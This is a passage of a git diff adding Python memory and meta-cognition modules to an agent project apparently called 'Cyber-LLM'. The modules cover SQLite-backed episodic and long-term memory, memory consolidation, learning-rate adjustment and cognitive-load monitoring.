3: # Minimum episodes + success_rate = 
stats['success'] / stats['total'] + patterns.append({ + 'pattern': f"Agent pattern: {key}", + 'frequency': stats['total'], + 'success_rate': success_rate + }) + + return sorted(patterns, key=lambda x: x['success_rate'], reverse=True) + + def _store_pattern(self, pattern_type: str, pattern: Dict[str, Any]): + """Store discovered pattern""" + try: + pattern_id = str(uuid.uuid4()) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT OR REPLACE INTO episode_patterns ( + id, pattern_type, pattern_description, + frequency, success_rate + ) VALUES (?, ?, ?, ?, ?) + """, ( + pattern_id, pattern_type, pattern['pattern'], + pattern['frequency'], pattern['success_rate'] + )) + + except Exception as e: + logger.error(f"Error storing pattern: {e}") + + def get_episodic_statistics(self) -> Dict[str, Any]: + """Get comprehensive episodic memory statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = {} + + # Basic episode counts + cursor = conn.execute("SELECT COUNT(*) FROM episodes") + stats['total_episodes'] = cursor.fetchone()[0] + + cursor = conn.execute("SELECT COUNT(*) FROM episodes WHERE success = 1") + stats['successful_episodes'] = cursor.fetchone()[0] + + # Episode type distribution + cursor = conn.execute(""" + SELECT episode_type, COUNT(*), + SUM(CASE WHEN success = 1 THEN 1 ELSE 0 END) as successes + FROM episodes + GROUP BY episode_type + """) + + episode_types = {} + for row in cursor.fetchall(): + episode_types[row[0]] = { + 'total': row[1], + 'successes': row[2], + 'success_rate': row[2] / row[1] if row[1] > 0 else 0 + } + stats['episode_types'] = episode_types + + # Agent performance + cursor = conn.execute(""" + SELECT agent_id, COUNT(*), + SUM(CASE WHEN success = 1 THEN 1 ELSE 0 END) as successes + FROM episodes + GROUP BY agent_id + """) + + agent_performance = {} + for row in cursor.fetchall(): + agent_performance[row[0]] = { + 'total_episodes': row[1], + 'successes': row[2], + 'success_rate': row[2] / row[1] if 
row[1] > 0 else 0 + } + stats['agent_performance'] = agent_performance + + # Replay statistics + cursor = conn.execute("SELECT COUNT(*) FROM experience_replay") + stats['total_replays'] = cursor.fetchone()[0] + + cursor = conn.execute("SELECT AVG(replay_effectiveness) FROM experience_replay") + avg_effectiveness = cursor.fetchone()[0] + stats['average_replay_effectiveness'] = avg_effectiveness or 0.0 + + # Pattern discovery + cursor = conn.execute("SELECT COUNT(*) FROM episode_patterns") + stats['discovered_patterns'] = cursor.fetchone()[0] + + return stats + + except Exception as e: + logger.error(f"Error getting episodic statistics: {e}") + return {'error': str(e)} + +# Export the main classes +__all__ = ['EpisodicMemorySystem', 'Episode', 'ExperienceReplay'] diff --git a/src/cognitive/long_term_memory.py b/src/cognitive/long_term_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..ddd9430ad9d38f9ddfbf1ab5f97bd2be9d947c1b --- /dev/null +++ b/src/cognitive/long_term_memory.py @@ -0,0 +1,427 @@ +""" +Advanced Long-term Memory Architecture for Persistent Agent Memory +Implements cross-session memory persistence with intelligent retrieval +""" +import sqlite3 +import json +import hashlib +import numpy as np +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path + +logger = logging.getLogger(__name__) + +@dataclass +class MemoryRecord: + """Individual memory record with metadata""" + id: str + content: str + memory_type: str # episodic, semantic, procedural, strategic + timestamp: datetime + importance: float + access_count: int + last_accessed: datetime + embedding: Optional[List[float]] = None + tags: List[str] = None + agent_id: str = "" + session_id: str = "" + + def __post_init__(self): + if self.tags is None: + self.tags = [] + +class LongTermMemoryManager: + """Advanced persistent memory system with 
cross-session capabilities""" + + def __init__(self, db_path: str = "data/cognitive/long_term_memory.db"): + """Initialize long-term memory system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + self._memory_cache = {} + self._embeddings_model = None + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS long_term_memory ( + id TEXT PRIMARY KEY, + content TEXT NOT NULL, + memory_type TEXT NOT NULL, + timestamp TEXT NOT NULL, + importance REAL NOT NULL, + access_count INTEGER DEFAULT 0, + last_accessed TEXT NOT NULL, + embedding TEXT, + tags TEXT, + agent_id TEXT, + session_id TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + updated_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_associations ( + id TEXT PRIMARY KEY, + memory_id_1 TEXT, + memory_id_2 TEXT, + association_type TEXT, + strength REAL, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (memory_id_1) REFERENCES long_term_memory(id), + FOREIGN KEY (memory_id_2) REFERENCES long_term_memory(id) + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_consolidation_log ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + consolidation_type TEXT, + memories_processed INTEGER, + patterns_discovered INTEGER, + timestamp TEXT DEFAULT CURRENT_TIMESTAMP, + details TEXT + ) + """) + + # Create indices for performance + conn.execute("CREATE INDEX IF NOT EXISTS idx_memory_type ON long_term_memory(memory_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_agent_id ON long_term_memory(agent_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_importance ON long_term_memory(importance)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_timestamp ON long_term_memory(timestamp)") + + def store_memory(self, content: str, memory_type: str, + importance: float = 0.5, agent_id: str = "", 
+ session_id: str = "", tags: List[str] = None) -> str: + """Store a new memory with intelligent categorization""" + try: + memory_id = hashlib.sha256(f"{content}{memory_type}{datetime.now().isoformat()}".encode()).hexdigest() + + record = MemoryRecord( + id=memory_id, + content=content, + memory_type=memory_type, + timestamp=datetime.now(), + importance=importance, + access_count=0, + last_accessed=datetime.now(), + tags=tags or [], + agent_id=agent_id, + session_id=session_id + ) + + # Generate embedding for semantic search + if self._embeddings_model: + record.embedding = self._generate_embedding(content) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO long_term_memory ( + id, content, memory_type, timestamp, importance, + access_count, last_accessed, embedding, tags, agent_id, session_id + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + record.id, record.content, record.memory_type, + record.timestamp.isoformat(), record.importance, + record.access_count, record.last_accessed.isoformat(), + json.dumps(record.embedding) if record.embedding else None, + json.dumps(record.tags), record.agent_id, record.session_id + )) + + logger.info(f"Stored long-term memory: {memory_id[:8]}... 
({memory_type})") + return memory_id + + except Exception as e: + logger.error(f"Error storing memory: {e}") + return "" + + def retrieve_memories(self, query: str = "", memory_type: str = "", + agent_id: str = "", limit: int = 10, + importance_threshold: float = 0.0) -> List[MemoryRecord]: + """Retrieve memories with intelligent filtering and ranking""" + try: + with sqlite3.connect(self.db_path) as conn: + conditions = [] + params = [] + + if query: + conditions.append("content LIKE ?") + params.append(f"%{query}%") + + if memory_type: + conditions.append("memory_type = ?") + params.append(memory_type) + + if agent_id: + conditions.append("agent_id = ?") + params.append(agent_id) + + if importance_threshold > 0: + conditions.append("importance >= ?") + params.append(importance_threshold) + + where_clause = " AND ".join(conditions) if conditions else "1=1" + + cursor = conn.execute(f""" + SELECT * FROM long_term_memory + WHERE {where_clause} + ORDER BY importance DESC, access_count DESC, timestamp DESC + LIMIT ? 
+ """, params + [limit]) + + memories = [] + for row in cursor.fetchall(): + memory = MemoryRecord( + id=row[0], + content=row[1], + memory_type=row[2], + timestamp=datetime.fromisoformat(row[3]), + importance=row[4], + access_count=row[5], + last_accessed=datetime.fromisoformat(row[6]), + embedding=json.loads(row[7]) if row[7] else None, + tags=json.loads(row[8]) if row[8] else [], + agent_id=row[9] or "", + session_id=row[10] or "" + ) + memories.append(memory) + + # Update access statistics + self._update_access_stats(memory.id) + + logger.info(f"Retrieved {len(memories)} memories for query: {query[:50]}...") + return memories + + except Exception as e: + logger.error(f"Error retrieving memories: {e}") + return [] + + def consolidate_memories(self) -> Dict[str, int]: + """Advanced memory consolidation with pattern discovery""" + try: + stats = { + 'memories_processed': 0, + 'patterns_discovered': 0, + 'associations_created': 0, + 'memories_merged': 0 + } + + with sqlite3.connect(self.db_path) as conn: + # Get all memories for consolidation + cursor = conn.execute(""" + SELECT * FROM long_term_memory + ORDER BY timestamp DESC + """) + + memories = cursor.fetchall() + stats['memories_processed'] = len(memories) + + # Pattern discovery through content similarity + for i, memory1 in enumerate(memories): + for j, memory2 in enumerate(memories[i+1:], i+1): + similarity = self._calculate_semantic_similarity( + memory1[1], memory2[1] + ) + + if similarity > 0.8: # High similarity threshold + self._create_memory_association( + memory1[0], memory2[0], "semantic_similarity", similarity + ) + stats['associations_created'] += 1 + stats['patterns_discovered'] += 1 + + # Temporal pattern detection + self._detect_temporal_patterns(memories) + + # Log consolidation results + conn.execute(""" + INSERT INTO memory_consolidation_log ( + consolidation_type, memories_processed, + patterns_discovered, details + ) VALUES (?, ?, ?, ?) 
+ """, ( + "full_consolidation", stats['memories_processed'], + stats['patterns_discovered'], json.dumps(stats) + )) + + logger.info(f"Memory consolidation complete: {stats}") + return stats + + except Exception as e: + logger.error(f"Error during memory consolidation: {e}") + return {'error': str(e)} + + def get_cross_session_context(self, agent_id: str, limit: int = 20) -> List[MemoryRecord]: + """Retrieve cross-session context for agent continuity""" + try: + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute(""" + SELECT * FROM long_term_memory + WHERE agent_id = ? + ORDER BY importance DESC, last_accessed DESC, timestamp DESC + LIMIT ? + """, (agent_id, limit)) + + memories = [] + for row in cursor.fetchall(): + memory = MemoryRecord( + id=row[0], + content=row[1], + memory_type=row[2], + timestamp=datetime.fromisoformat(row[3]), + importance=row[4], + access_count=row[5], + last_accessed=datetime.fromisoformat(row[6]), + embedding=json.loads(row[7]) if row[7] else None, + tags=json.loads(row[8]) if row[8] else [], + agent_id=row[9] or "", + session_id=row[10] or "" + ) + memories.append(memory) + + logger.info(f"Retrieved {len(memories)} cross-session memories for agent {agent_id}") + return memories + + except Exception as e: + logger.error(f"Error retrieving cross-session context: {e}") + return [] + + def _update_access_stats(self, memory_id: str): + """Update memory access statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE long_term_memory + SET access_count = access_count + 1, + last_accessed = ?, + updated_at = CURRENT_TIMESTAMP + WHERE id = ? 
+ """, (datetime.now().isoformat(), memory_id)) + + except Exception as e: + logger.error(f"Error updating access stats: {e}") + + def _generate_embedding(self, content: str) -> List[float]: + """Generate embeddings for semantic search (placeholder)""" + # In production, use a proper embedding model + # For now, return a simple hash-based vector + hash_val = hash(content) + return [float((hash_val >> i) & 1) for i in range(128)] + + def _calculate_semantic_similarity(self, text1: str, text2: str) -> float: + """Calculate semantic similarity between texts""" + # Simple word overlap similarity (replace with proper embeddings) + words1 = set(text1.lower().split()) + words2 = set(text2.lower().split()) + + if not words1 or not words2: + return 0.0 + + intersection = len(words1 & words2) + union = len(words1 | words2) + + return intersection / union if union > 0 else 0.0 + + def _create_memory_association(self, memory_id_1: str, memory_id_2: str, + association_type: str, strength: float): + """Create association between memories""" + try: + association_id = hashlib.sha256( + f"{memory_id_1}{memory_id_2}{association_type}".encode() + ).hexdigest() + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT OR REPLACE INTO memory_associations ( + id, memory_id_1, memory_id_2, association_type, strength + ) VALUES (?, ?, ?, ?, ?) 
+ """, (association_id, memory_id_1, memory_id_2, association_type, strength)) + + except Exception as e: + logger.error(f"Error creating memory association: {e}") + + def _detect_temporal_patterns(self, memories: List[Tuple]): + """Detect temporal patterns in memory sequences""" + # Group memories by agent and detect sequences + agent_memories = {} + for memory in memories: + agent_id = memory[9] or "unknown" + if agent_id not in agent_memories: + agent_memories[agent_id] = [] + agent_memories[agent_id].append(memory) + + # Analyze patterns within each agent's memory timeline + for agent_id, agent_mem_list in agent_memories.items(): + # Sort by timestamp + agent_mem_list.sort(key=lambda x: x[3]) # timestamp is at index 3 + + # Detect recurring patterns or sequences + # This is a simplified pattern detection + for i in range(len(agent_mem_list) - 2): + # Look for sequences of similar operations + mem1, mem2, mem3 = agent_mem_list[i:i+3] + + # Check for similar memory types in sequence + if mem1[2] == mem2[2] == mem3[2]: # same memory_type + self._create_memory_association( + mem1[0], mem3[0], "temporal_sequence", 0.7 + ) + + def get_memory_statistics(self) -> Dict[str, Any]: + """Get comprehensive memory system statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = {} + + # Basic counts + cursor = conn.execute("SELECT COUNT(*) FROM long_term_memory") + stats['total_memories'] = cursor.fetchone()[0] + + # Memory type distribution + cursor = conn.execute(""" + SELECT memory_type, COUNT(*) + FROM long_term_memory + GROUP BY memory_type + """) + stats['memory_types'] = dict(cursor.fetchall()) + + # Agent distribution + cursor = conn.execute(""" + SELECT agent_id, COUNT(*) + FROM long_term_memory + WHERE agent_id != '' + GROUP BY agent_id + """) + stats['agent_distribution'] = dict(cursor.fetchall()) + + # Importance distribution + cursor = conn.execute(""" + SELECT + CASE + WHEN importance >= 0.8 THEN 'high' + WHEN importance >= 0.5 THEN 'medium' 
+ ELSE 'low' + END as importance_level, + COUNT(*) + FROM long_term_memory + GROUP BY importance_level + """) + stats['importance_distribution'] = dict(cursor.fetchall()) + + # Association statistics + cursor = conn.execute("SELECT COUNT(*) FROM memory_associations") + stats['total_associations'] = cursor.fetchone()[0] + + return stats + + except Exception as e: + logger.error(f"Error getting memory statistics: {e}") + return {'error': str(e)} + +# Export the main class +__all__ = ['LongTermMemoryManager', 'MemoryRecord'] diff --git a/src/cognitive/meta_cognitive.py b/src/cognitive/meta_cognitive.py new file mode 100644 index 0000000000000000000000000000000000000000..51643f973b799475e40e069351c0f50cf7551023 --- /dev/null +++ b/src/cognitive/meta_cognitive.py @@ -0,0 +1,487 @@ +""" +Meta-Cognitive Capabilities for Cyber-LLM +Self-reflection, adaptation, and cognitive load management + +Author: Muzan Sano +""" + +import asyncio +import json +import logging +import numpy as np +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple, Union +from dataclasses import dataclass, field +from enum import Enum +import torch +import torch.nn as nn +from collections import deque + +from ..utils.logging_system import CyberLLMLogger, CyberLLMError, ErrorCategory +from ..memory.persistent_memory import PersistentMemoryManager +from ..memory.strategic_planning import StrategicPlanningEngine + +class CognitiveState(Enum): + """Cognitive processing states""" + OPTIMAL = "optimal" + MODERATE_LOAD = "moderate_load" + HIGH_LOAD = "high_load" + OVERLOADED = "overloaded" + RECOVERING = "recovering" + +class AdaptationStrategy(Enum): + """Learning adaptation strategies""" + AGGRESSIVE = "aggressive" + MODERATE = "moderate" + CONSERVATIVE = "conservative" + CAUTIOUS = "cautious" + +@dataclass +class CognitiveMetrics: + """Cognitive performance metrics""" + timestamp: datetime + + # Performance metrics + task_completion_rate: float + accuracy_score: 
@dataclass
class SelfReflectionResult:
    """Results from self-reflection analysis.

    Produced by MetaCognitiveEngine.conduct_self_reflection(); bundles the
    performance assessment, strategy evaluation, cognitive insights, and the
    action items derived from them for a single reflection pass.
    """
    reflection_id: str    # unique id, e.g. "reflection_<YYYYmmdd_HHMMSS>"
    timestamp: datetime   # when the reflection was generated

    # Performance assessment
    strengths: List[str]
    weaknesses: List[str]
    improvement_areas: List[str]  # union of weaknesses and adjustment topics

    # Strategy effectiveness
    effective_strategies: List[str]
    ineffective_strategies: List[str]
    recommended_changes: List[str]  # immediate adjustments + medium-term goals

    # Cognitive insights
    cognitive_patterns: Dict[str, Any]
    load_management_insights: List[str]
    attention_allocation_insights: List[str]

    # Action items, ordered by time horizon
    immediate_adjustments: List[str]
    medium_term_goals: List[str]
    long_term_objectives: List[str]
self.learning_rate_optimizer = LearningRateOptimizer() + self.strategy_evaluator = StrategyEvaluator() + + # Neural networks for meta-learning + self.performance_predictor = self._build_performance_predictor() + self.strategy_selector = self._build_strategy_selector() + + self.logger.info("Meta-Cognitive Engine initialized") + + async def conduct_self_reflection(self, + time_period: timedelta = timedelta(hours=1)) -> SelfReflectionResult: + """Conduct comprehensive self-reflection analysis""" + + reflection_id = f"reflection_{datetime.now().strftime('%Y%m%d_%H%M%S')}" + + try: + self.logger.info("Starting self-reflection analysis", reflection_id=reflection_id) + + # Gather performance data + end_time = datetime.now() + start_time = end_time - time_period + + performance_data = await self._gather_performance_data(start_time, end_time) + cognitive_data = await self._gather_cognitive_data(start_time, end_time) + strategy_data = await self._gather_strategy_data(start_time, end_time) + + # Analyze strengths and weaknesses + strengths, weaknesses = await self._analyze_performance_patterns(performance_data) + + # Evaluate strategy effectiveness + effective_strategies, ineffective_strategies = await self._evaluate_strategies(strategy_data) + + # Generate insights + cognitive_patterns = await self._analyze_cognitive_patterns(cognitive_data) + load_insights = await self._analyze_load_management(cognitive_data) + attention_insights = await self._analyze_attention_allocation(cognitive_data) + + # Generate recommendations + immediate_adjustments = await self._generate_immediate_adjustments( + weaknesses, ineffective_strategies, cognitive_patterns) + medium_term_goals = await self._generate_medium_term_goals( + strengths, weaknesses, cognitive_patterns) + long_term_objectives = await self._generate_long_term_objectives( + performance_data, cognitive_patterns) + + # Create reflection result + reflection_result = SelfReflectionResult( + reflection_id=reflection_id, + 
    async def optimize_learning_rate(self,
                                   recent_performance: List[float],
                                   task_complexity: float) -> float:
        """Optimize learning rate based on recent performance and task complexity.

        Args:
            recent_performance: sequence of recent performance scores used to
                derive a trend and variance.
            task_complexity: 0-1 complexity measure; higher complexity damps
                the learning rate.

        Returns:
            The new learning rate, clipped to [0.0001, 0.1].  On any failure
            the current rate is returned unchanged (best-effort behavior).
        """

        try:
            # Analyze performance trends
            # NOTE(review): _calculate_performance_trend is not defined in this
            # module view — confirm it exists on the class.
            performance_trend = self._calculate_performance_trend(recent_performance)
            performance_variance = np.var(recent_performance)

            # Current learning rate
            current_lr = self.learning_rate_optimizer.get_current_rate()

            # Adaptation strategy based on performance: thresholds below are
            # heuristic cut-offs on the trend/variance pair.
            if performance_trend > 0.1 and performance_variance < 0.05:
                # Good performance, stable -> slightly increase learning rate
                adaptation_factor = 1.1
                strategy = AdaptationStrategy.AGGRESSIVE
            elif performance_trend > 0.05:
                # Moderate improvement -> maintain or slight increase
                adaptation_factor = 1.05
                strategy = AdaptationStrategy.MODERATE
            elif performance_trend < -0.1 or performance_variance > 0.2:
                # Poor performance or high variance -> decrease learning rate
                adaptation_factor = 0.8
                strategy = AdaptationStrategy.CAUTIOUS
            else:
                # Stable performance -> minor adjustment based on complexity
                adaptation_factor = 1.0 - (task_complexity - 0.5) * 0.1
                strategy = AdaptationStrategy.CONSERVATIVE

            # Apply complexity adjustment: harder tasks get a smaller rate
            # (up to -30% at complexity 1.0).
            complexity_factor = 1.0 - (task_complexity * 0.3)
            final_factor = adaptation_factor * complexity_factor

            # Calculate new learning rate
            new_lr = current_lr * final_factor
            new_lr = np.clip(new_lr, 0.0001, 0.1)  # Keep within reasonable bounds

            # Update learning rate optimizer
            self.learning_rate_optimizer.update_rate(new_lr, strategy)

            self.logger.info("Learning rate optimized",
                           old_rate=current_lr,
                           new_rate=new_lr,
                           strategy=strategy.value,
                           performance_trend=performance_trend)

            return new_lr

        except Exception as e:
            # Best-effort: never propagate — fall back to the unchanged rate.
            self.logger.error("Learning rate optimization failed", error=str(e))
            return self.learning_rate_optimizer.get_current_rate()
current_load = await self._calculate_cognitive_load(current_tasks) + + # Determine cognitive state + new_state = self._determine_cognitive_state(current_load, available_resources) + + # Update state if changed + if new_state != self.current_state: + self.logger.info("Cognitive state changed", + old_state=self.current_state.value, + new_state=new_state.value) + self.current_state = new_state + self.state_history.append((datetime.now(), new_state)) + + # Generate load management strategy + management_strategy = await self._generate_load_management_strategy( + current_load, new_state, current_tasks, available_resources) + + # Apply attention allocation optimization + attention_allocation = await self.attention_allocator.optimize_allocation( + current_tasks, available_resources, new_state) + + # Generate recommendations + recommendations = await self._generate_load_management_recommendations( + current_load, new_state, management_strategy) + + result = { + "cognitive_state": new_state.value, + "cognitive_load": current_load, + "management_strategy": management_strategy, + "attention_allocation": attention_allocation, + "recommendations": recommendations, + "resource_adjustments": await self._calculate_resource_adjustments( + new_state, available_resources) + } + + self.logger.info("Cognitive load management completed", + state=new_state.value, + load=current_load, + recommendations_count=len(recommendations)) + + return result + + except Exception as e: + self.logger.error("Cognitive load management failed", error=str(e)) + return {"error": str(e)} + + def _build_performance_predictor(self) -> nn.Module: + """Build neural network for performance prediction""" + + class PerformancePredictor(nn.Module): + def __init__(self): + super().__init__() + self.fc1 = nn.Linear(20, 64) # Input: various metrics + self.fc2 = nn.Linear(64, 32) + self.fc3 = nn.Linear(32, 16) + self.fc4 = nn.Linear(16, 1) # Output: predicted performance + self.dropout = nn.Dropout(0.2) + + def 
forward(self, x): + x = torch.relu(self.fc1(x)) + x = self.dropout(x) + x = torch.relu(self.fc2(x)) + x = self.dropout(x) + x = torch.relu(self.fc3(x)) + x = torch.sigmoid(self.fc4(x)) + return x + + return PerformancePredictor() + + def _build_strategy_selector(self) -> nn.Module: + """Build neural network for strategy selection""" + + class StrategySelector(nn.Module): + def __init__(self): + super().__init__() + self.fc1 = nn.Linear(15, 48) # Input: context features + self.fc2 = nn.Linear(48, 24) + self.fc3 = nn.Linear(24, 8) # Output: strategy probabilities + self.dropout = nn.Dropout(0.15) + + def forward(self, x): + x = torch.relu(self.fc1(x)) + x = self.dropout(x) + x = torch.relu(self.fc2(x)) + x = torch.softmax(self.fc3(x), dim=-1) + return x + + return StrategySelector() + +class AttentionAllocator: + """Manages dynamic attention allocation across tasks""" + + def __init__(self): + self.attention_weights = {} + self.priority_scores = {} + self.allocation_history = deque(maxlen=1000) + + async def optimize_allocation(self, + tasks: List[Dict[str, Any]], + resources: Dict[str, float], + cognitive_state: CognitiveState) -> Dict[str, float]: + """Optimize attention allocation across tasks""" + + # Calculate base priority scores + for task in tasks: + task_id = task.get('id', str(hash(str(task)))) + priority = task.get('priority', 0.5) + complexity = task.get('complexity', 0.5) + deadline_pressure = task.get('deadline_pressure', 0.0) + + # Adjust priority based on cognitive state + state_multiplier = { + CognitiveState.OPTIMAL: 1.0, + CognitiveState.MODERATE_LOAD: 0.9, + CognitiveState.HIGH_LOAD: 0.7, + CognitiveState.OVERLOADED: 0.5, + CognitiveState.RECOVERING: 0.6 + }.get(cognitive_state, 1.0) + + adjusted_priority = (priority * 0.4 + + deadline_pressure * 0.4 + + (1.0 - complexity) * 0.2) * state_multiplier + + self.priority_scores[task_id] = adjusted_priority + + # Normalize allocation + total_priority = sum(self.priority_scores.values()) + if 
class CognitiveLoadMonitor:
    """Tracks cognitive load over time and derives a single 0-1 load score."""

    def __init__(self):
        # Rolling record of (timestamp, raw combined load), capped at 10k samples.
        self.load_history = deque(maxlen=10000)
        # Reserved for detected load patterns (not populated in this class).
        self.load_patterns = {}

    def calculate_load(self,
                       active_tasks: int,
                       task_complexity: float,
                       resource_usage: float,
                       error_rate: float) -> float:
        """Combine task count, complexity, resource pressure and errors into a load score.

        The returned value is clamped to [0, 1]; the un-clamped sum is what
        gets recorded in load_history.
        """
        components = [
            # Task volume contributes logarithmically; 9 concurrent tasks saturate at 1.0.
            min(np.log(active_tasks + 1) / np.log(10), 1.0),
            task_complexity * 0.3,              # complexity weight
            resource_usage * 0.25,              # resource pressure
            min(error_rate ** 0.5, 1.0) * 0.2,  # error pressure, sqrt-damped
        ]
        combined = sum(components)

        self.load_history.append((datetime.now(), combined))
        return min(combined, 1.0)
self.strategy_scores = {} + + def record_strategy_outcome(self, strategy: str, outcome_score: float): + if strategy not in self.strategy_outcomes: + self.strategy_outcomes[strategy] = deque(maxlen=100) + + self.strategy_outcomes[strategy].append((datetime.now(), outcome_score)) + + # Update average score + scores = [score for _, score in self.strategy_outcomes[strategy]] + self.strategy_scores[strategy] = np.mean(scores) + +# Factory function +def create_meta_cognitive_engine(memory_manager: PersistentMemoryManager, + strategic_planner: StrategicPlanningEngine, + **kwargs) -> MetaCognitiveEngine: + """Create meta-cognitive engine""" + return MetaCognitiveEngine(memory_manager, strategic_planner, **kwargs) diff --git a/src/cognitive/persistent_memory.py b/src/cognitive/persistent_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..8220014153138e26398372d668dccdb3c379996b --- /dev/null +++ b/src/cognitive/persistent_memory.py @@ -0,0 +1,1165 @@ +""" +Persistent Memory Architecture for Advanced Cognitive Agents +Long-term memory systems with cross-session persistence and strategic thinking +""" + +import sqlite3 +import json +import pickle +import numpy as np +from typing import Dict, List, Optional, Any, Tuple, Union, Set +from dataclasses import dataclass, asdict +from datetime import datetime, timedelta +import logging +from abc import ABC, abstractmethod +from collections import defaultdict, deque +import asyncio +import threading +import time +from enum import Enum +import hashlib +import uuid +from pathlib import Path + +class MemoryType(Enum): + EPISODIC = "episodic" # Events and experiences + SEMANTIC = "semantic" # Facts and knowledge + PROCEDURAL = "procedural" # Skills and procedures + WORKING = "working" # Temporary active memory + STRATEGIC = "strategic" # Long-term goals and plans + +class ReasoningType(Enum): + DEDUCTIVE = "deductive" # General to specific + INDUCTIVE = "inductive" # Specific to general + ABDUCTIVE = 
"abductive" # Best explanation + ANALOGICAL = "analogical" # Pattern matching + CAUSAL = "causal" # Cause and effect + STRATEGIC = "strategic" # Goal-oriented + COUNTERFACTUAL = "counterfactual" # What-if scenarios + METACOGNITIVE = "metacognitive" # Thinking about thinking + +@dataclass +class MemoryItem: + """Base class for memory items""" + memory_id: str + memory_type: MemoryType + content: Dict[str, Any] + timestamp: str + importance: float # 0.0 to 1.0 + access_count: int + last_accessed: str + tags: List[str] + metadata: Dict[str, Any] + expires_at: Optional[str] = None + +@dataclass +class EpisodicMemory(MemoryItem): + """Specific events and experiences""" + event_type: str + context: Dict[str, Any] + outcome: Dict[str, Any] + learned_patterns: List[str] + emotional_valence: float # -1.0 (negative) to 1.0 (positive) + + def __post_init__(self): + self.memory_type = MemoryType.EPISODIC + +@dataclass +class SemanticMemory(MemoryItem): + """Facts and general knowledge""" + concept: str + properties: Dict[str, Any] + relationships: List[Dict[str, Any]] + confidence: float + evidence: List[str] + + def __post_init__(self): + self.memory_type = MemoryType.SEMANTIC + +@dataclass +class ProceduralMemory(MemoryItem): + """Skills and procedures""" + skill_name: str + steps: List[Dict[str, Any]] + conditions: Dict[str, Any] + success_rate: float + optimization_history: List[Dict[str, Any]] + + def __post_init__(self): + self.memory_type = MemoryType.PROCEDURAL + +@dataclass +class WorkingMemory(MemoryItem): + """Temporary active memory""" + current_goal: str + active_context: Dict[str, Any] + attention_focus: List[str] + processing_state: Dict[str, Any] + + def __post_init__(self): + self.memory_type = MemoryType.WORKING + +@dataclass +class StrategicMemory(MemoryItem): + """Long-term goals and strategic plans""" + goal: str + plan_steps: List[Dict[str, Any]] + progress: float + deadline: Optional[str] + priority: int + dependencies: List[str] + success_criteria: 
    def _init_consolidation_rules(self) -> Dict[str, Any]:
        """Initialize memory consolidation rules.

        Central tunables for the periodic consolidation passes; each top-level
        key maps to the pass that consumes it (see consolidate_memories).
        Values are heuristics and are candidates for external configuration.
        """
        return {
            # Promotion of repeated episodes into semantic knowledge
            # (_consolidate_episodic_to_semantic / _group_similar_memories).
            'episodic_to_semantic': {
                'min_occurrences': 3,         # episodes required before a pattern is promoted
                'similarity_threshold': 0.8,  # min content similarity to group two episodes
                'time_window_days': 30        # NOTE(review): not read in this module view — confirm intended use
            },
            # Importance decay parameters.
            # NOTE(review): no decay pass is visible in this module view —
            # confirm these are applied elsewhere.
            'importance_decay': {
                'decay_rate': 0.95,
                'min_importance': 0.1,
                'access_boost': 1.1
            },
            # Working-memory eviction (_cleanup_working_memory).
            'working_memory_cleanup': {
                'max_age_hours': 24,          # items older than this are deleted
                'max_items': 100,             # hard cap; lowest-ranked overflow is deleted
                'importance_threshold': 0.3   # items below this importance are deleted
            },
            # Strategic plan maintenance (_update_strategic_plans).
            'strategic_plan_updates': {
                'progress_review_days': 7,    # NOTE(review): not read in this module view — confirm
                'priority_adjustment': True,
                'dependency_check': True
            }
        }
self._optimize_procedural_memories(agent_id) + + # Clean working memory + consolidation_results['working_memory_cleanup'] = await self._cleanup_working_memory(agent_id) + + # Update strategic plans + consolidation_results['strategic_updates'] = await self._update_strategic_plans(agent_id) + + consolidation_results['total_processing_time'] = time.time() - start_time + + self.logger.info(f"Memory consolidation completed for agent {agent_id}: {consolidation_results}") + + except Exception as e: + self.logger.error(f"Error during memory consolidation for agent {agent_id}: {e}") + + return consolidation_results + + async def _consolidate_episodic_to_semantic(self, agent_id: str) -> int: + """Convert repeated episodic memories to semantic knowledge""" + consolidated_count = 0 + + with sqlite3.connect(self.database_path) as conn: + # Find similar episodic memories + cursor = conn.execute(""" + SELECT memory_id, content, timestamp, importance, access_count + FROM memory_items + WHERE agent_id = ? AND memory_type = 'episodic' + ORDER BY timestamp DESC LIMIT 1000 + """, (agent_id,)) + + episodic_memories = cursor.fetchall() + + # Group similar memories + memory_groups = self._group_similar_memories(episodic_memories) + + for group in memory_groups: + if len(group) >= self.consolidation_rules['episodic_to_semantic']['min_occurrences']: + # Create semantic memory from pattern + semantic_memory = self._create_semantic_from_episodic_group(group, agent_id) + + if semantic_memory: + # Insert semantic memory + conn.execute(""" + INSERT INTO memory_items + (memory_id, agent_id, memory_type, content, timestamp, importance, + access_count, last_accessed, tags, metadata) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) 
